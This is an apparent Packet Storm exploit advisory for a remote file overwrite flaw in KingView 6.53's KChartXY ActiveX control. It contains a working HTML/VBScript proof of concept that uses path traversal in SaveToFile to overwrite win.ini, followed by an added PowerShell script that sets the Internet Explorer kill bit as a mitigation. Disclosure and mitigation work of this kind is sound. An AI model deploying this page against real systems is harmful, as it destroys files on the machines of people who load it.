KingView 6.53 Active-X File Overwrite / Creation

2013-09-05T00:00:00
ID PACKETSTORM:123116
Type packetstorm
Reporter Blake
Modified 2013-09-05T00:00:00

Description

`<!--  
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite  
Vendor: http://www.wellintech.com  
Version: KingView 6.53  
Tested on: Windows XP SP3 / IE  
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip  
Author: Blake  
  
CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC  
ProgId: KCHARTXYLib.KChartXY  
Path: C:\Program Files\KingView\KChartXY.ocx  
MemberName: SaveToFile  
Safe for scripting: False  
Safe for init: False  
Kill Bit: False  
IObjectSafety not implemented  
  
Description: Proof of concept overwrites the win.ini file  
-->  
<html>  
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>  
<script language='vbscript'>  
  
arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"  
  
target.SaveToFile arg1  
  
</script>  
</html>  
`
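
The advisory lists "Kill Bit: False" for this control. As an added example (not part of the original advisory or the vendor's guidance), the PowerShell below checks and sets the Internet Explorer kill bit for the CLSID given above, in both the native and 32-bit registry views. The function names are hypothetical, and the script assumes an elevated session.

```powershell
# Added example, not from the advisory. Function names are hypothetical.
# CLSID of KChartXY.ocx, taken from the advisory above.
$Clsid   = '{A9A2011A-1E02-4242-AAE0-B239A6F88BAC}'
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE from loading the control

# Native and 32-bit (WOW64) registry views; the second exists only on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-ActiveXCompatFlags {
    param([string]$Root, [string]$Clsid)
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) { return 0 }
    $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return 0 }
    return [int]$prop.'Compatibility Flags'
}

function Set-ActiveXKillBit {
    param([string]$Root, [string]$Clsid)
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # Preserve any flags already present and OR in the kill bit.
    $flags = (Get-ActiveXCompatFlags -Root $Root -Clsid $Clsid) -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
        -PropertyType DWord -Value $flags -Force | Out-Null
    return $flags
}

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on this OS
    $before = Get-ActiveXCompatFlags -Root $root -Clsid $Clsid
    if ($before -band $KillBit) {
        Write-Output ("{0}: kill bit already set (flags 0x{1:X})" -f $root, $before)
    } else {
        $after = Set-ActiveXKillBit -Root $root -Clsid $Clsid
        Write-Output ("{0}: kill bit set (flags 0x{1:X} -> 0x{2:X})" -f $root, $before, $after)
    }
}
```

The kill bit only stops Internet Explorer and other hosts that honour it from instantiating the control; it does not change the behaviour of `SaveToFile` itself.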